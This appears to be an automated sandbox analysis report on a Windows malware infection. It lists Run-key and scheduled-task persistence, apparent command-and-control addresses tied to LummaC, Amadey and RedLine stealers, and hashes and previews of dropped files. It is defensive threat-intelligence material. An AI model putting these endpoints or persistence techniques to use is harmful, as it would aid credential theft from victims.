                                                                                                                                                                                                                                                                                      10:49:13API Interceptor22507x Sleep call for process: be08f59021.exe modified
                                                                                                                                                                                                                                                                                      10:49:31API Interceptor391x Sleep call for process: d8d3046b98.exe modified
                                                                                                                                                                                                                                                                                      16:46:51Task SchedulerRun new task: {EDD80865-E7DE-48F4-ADE4-853B75CC4E0C} path: .
                                                                                                                                                                                                                                                                                      16:47:04Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      16:48:14Task SchedulerRun new task: MyBootTask path: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                      16:48:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                                                      16:48:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe
                                                                                                                                                                                                                                                                                      16:48:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                                                      16:48:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe
                                                                                                                                                                                                                                                                                      16:48:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exe C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe
                                                                                                                                                                                                                                                                                      16:49:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exe C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                      16:49:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exe C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe
                                                                                                                                                                                                                                                                                      16:49:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exe C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe
                                                                                                                                                                                                                                                                                      16:49:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exe C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                      16:49:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exe C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe
                                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                      185.215.113.43ZzS8KjNjr7.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      Szi2WJUKmv.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      PGkSZbFKmI.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      FAz4V7wbYU.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      CcIlKT6XdC.exeGet hashmaliciousAmadey, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                                                      185.81.68.147tjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        34.117.59.81file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                                                                                                                                        Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                                                                                                                                        idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                                                                                                                                        idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                                                                                                                                        FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                                                                                                                                        172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                                                                                                                                        VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                                                                                                                                        UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                                                                                                                                        I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/json
                                                                                                                                                                                                                                                                                        licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                                                                                                                                                                                        • ipinfo.io/ip
                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                        chrome.cloudflare-dns.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                        33abb.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                        56ff7c.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                                        57ff67.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                                        setup (2).msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                                        Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                        Document.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                        Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                        751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                                        star-mini.c10r.facebook.comhttps://connect-velocity-33392.my.salesforce-sites.com/helpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 157.240.196.35
                                                                                                                                                                                                                                                                                        yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                        • 157.240.196.35
                                                                                                                                                                                                                                                                                        http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                                                                        • 157.240.196.35
                                                                                                                                                                                                                                                                                        http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                                                                        • 157.240.196.35
                                                                                                                                                                                                                                                                                        https://www.amberdrinks.lt/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 157.240.196.35
                                                                                                                                                                                                                                                                                        http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                                                                        • 157.240.196.35
                                                                                                                                                                                                                                                                                        https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 157.240.195.35
                                                                                                                                                                                                                                                                                        http://get-derila.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 157.240.196.35
                                                                                                                                                                                                                                                                                        vFile__0054seconds__Arkansas.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 157.240.195.35
                                                                                                                                                                                                                                                                                        Final Demand to Harbor Wholesale Grocery Inc.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 157.240.196.35
                                                                                                                                                                                                                                                                                        twitter.comyiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                        • 104.244.42.193
                                                                                                                                                                                                                                                                                        https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 104.244.42.129
                                                                                                                                                                                                                                                                                        k5NcGFI29j.exeGet hashmaliciousJigsawBrowse
                                                                                                                                                                                                                                                                                        • 104.244.42.65
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                        • 104.244.42.193
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 104.244.42.193
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 104.244.42.193
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 104.244.42.129
                                                                                                                                                                                                                                                                                        services.addons.mozilla.orgk5NcGFI29j.exeGet hashmaliciousJigsawBrowse
                                                                                                                                                                                                                                                                                        • 151.101.129.91
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                        • 151.101.1.91
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 151.101.193.91
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 151.101.1.91
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 151.101.129.91
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 151.101.193.91
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 151.101.193.91
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 151.101.65.91
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 151.101.65.91
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 151.101.65.91
                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                        KLNOPT-ASFItjpq0h4wEH.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                                                                                                                        LxYpBRhMBx.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                                                        • 185.81.68.115
                                                                                                                                                                                                                                                                                        WHOLESALECONNECTIONSNLfWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                                                                                                                                        ZzS8KjNjr7.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                                                                                                                        Szi2WJUKmv.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.43
                                                                                                                                                                                                                                                                                        aYxpioi6G3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                                                                                                                        PGkSZbFKmI.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                                                                                                                        FAz4V7wbYU.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                                                                                                                        yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                                                                                                                        XUd96YD9O6.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                                                                                                                        vuxDaHveW5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                                                                                                                        3jr0P5izLl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                                                                                                                                        GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                                                                                                                                        Josho.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 34.119.80.120
                                                                                                                                                                                                                                                                                        http://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                                                                                                                                        Product Blueprint..htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                        • 34.117.59.81
                                                                                                                                                                                                                                                                                        k5NcGFI29j.exeGet hashmaliciousJigsawBrowse
                                                                                                                                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                        • 34.117.188.166
                                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):156917
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.994509354006501
                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                        SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                                                                                                                                        MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                                                                                                        SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                                                                                                        SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                                                                                                        SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):123394
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.993523589542907
                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                        SSDEEP:1536:NoxiTioXtBWFfsYExW94I9tiiGCidzWdZNF9p3Ymn9Zqmi943C42nYEmL9yqhTjV:yxFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre
                                                                                                                                                                                                                                                                                        MD5:53E54AC43786C11E0DDE9DB8F4EB27AB
                                                                                                                                                                                                                                                                                        SHA1:9C5768D5EE037E90DA77F174EF9401970060520E
                                                                                                                                                                                                                                                                                        SHA-256:2F606D24809902AF1BB9CB59C16A2C82960D95BFF923EA26F6A42076772F1DB8
                                                                                                                                                                                                                                                                                        SHA-512:CD1F6D5F4D8CD19226151B6674124AB1E10950AF5A049E8C082531867D71BFAE9D7BC65641171FD55D203E4FBA9756C80D11906D85A30B35EE4E8991ADB21950
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:PK........DwiY(..wj...........graph.exe..{|...8......f....D]5..HP..d..... Q@b.1.[$.\..&.p.....j.-.V..6...=P!.U@...K...*.>.sf7..b...._/...3....<....oY/..A...................u....].l.(...UyWuv....\x....w.......0|_.].e........*==.m.qq....v....g...~o.........~.V?@.s.......z.......#|.o..........~.].X...%.A......>..xZ.p.0.:.2a.U..PZ...E.^.`>......+d.9..s.x..O.....+............K.2...3...9.M......k3;j.[o.*mg..U.%!...A+.....3O6T{...o....j.:.4.]m...q.{..&...?.A....Q[.|..x.K.X....U.|..V/,......6...|w.s..@0BX...O.I..._..R..@~T.2.t..IK?..M.E.|^............B._C.....-..y;....V.......,|f.wl......:...T./4TbV.\.+..H.....2%.sZ..D.#..}.o..x..w... ..p.!..,..o ...S.]......].}.......c.w..2...<s........!.2'....m.v.><...Ox...O.(C.....@....T.o.Uwm......(ve<...x.f3..\...D..X._.G.7.3.l;..>tQ...5.e..D...lO.i{./..;.JgK........ ...tJ. I.....>..8..Pa...=.Il.S..?.)..@}...:..Cmh.;.v...T.{K..9.)Pqg.%..5.....6..<w..........`-..+h..oA...2.K.......{.."..Wu.;I..w.^o...
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):251392
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.173345887744036
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:TxwndeWCdXSpfDYlUgEP86yZ7JUlfQEc:Tx1dXYYlLEP8l7J8
                                                                                                                                                                                                                                                                                        MD5:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                                                        SHA1:7BD1D979DE4A86CB0D8C2AD9E1945BD351339AD0
                                                                                                                                                                                                                                                                                        SHA-256:D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
                                                                                                                                                                                                                                                                                        SHA-512:C3164B2F09DC914066201562BE6483F61D3C368675AC5D3466C2D5B754813B8B23FD09AF86B1F15AB8CC91BE8A52B3488323E7A65198E5B104F9C635EC5ED5CC
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.1!am_ram_ram_r*.\sdm_r*.Zs.m_rq.\skm_rq.[sqm_r*.[spm_rq.Zs8m_r*.^shm_ram^r.m_r*.Vs`m_r*.r`m_r*.]s`m_rRicham_r........PE..d...../g.........."....).|...n.................@............................. ............`.....................................................d...............`'...................A..p...........................`@..@...............h............................text....z.......|.................. ..`.rdata..............................@..@.data...$-..........................@....pdata..`'.......(..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.03799545499236577
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZru/bNb/fc3DDTnHI:58r54w0VW3xWZrwbFHc3T
                                                                                                                                                                                                                                                                                        MD5:96AB9233CA2AB3982F98B1BA44CFFE32
                                                                                                                                                                                                                                                                                        SHA1:A72C6AF1881274392B7D73594D78C4D3F1B91428
                                                                                                                                                                                                                                                                                        SHA-256:C764FE5DA2665335A3C2E60091F08E21A16CEC35EFD453AE092FEB1D7C3D69BC
                                                                                                                                                                                                                                                                                        SHA-512:E09E96834C049E56FE5E9A56BA1635CA6A4FB5DF2F2EB8F339C94D4BCF2D24150592B2833D084BD4BD7D0319B4D5C493B5B49A64310E084684375D645DD8CEEC
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1808), with CRLF line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):12814
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.448756185888108
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:192:cnBRNZ3YbBp6M1R1+PaX56/x8lz9/3/7ao5RHNBw8dXSl:cel1M/xU9bPwG0
                                                                                                                                                                                                                                                                                        MD5:F4B8B77C8BB1E375605D81E7B80A13B4
                                                                                                                                                                                                                                                                                        SHA1:D8E32789CE08EC5AA0DCA6CE25AF9086EF1CF07E
                                                                                                                                                                                                                                                                                        SHA-256:3A21804422A0472E025D2B19C8A482C52D722AD80768F60EBA74E4E7B8409763
                                                                                                                                                                                                                                                                                        SHA-512:5E02105E543A5BEB4FFB2B16C8DBFCC81D9C74C9337DE38F4925328D3C1A02E929774BBEBDDEC51F3B796EB182A3616A3B1430794C76DED62974265DBEE91FA4
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
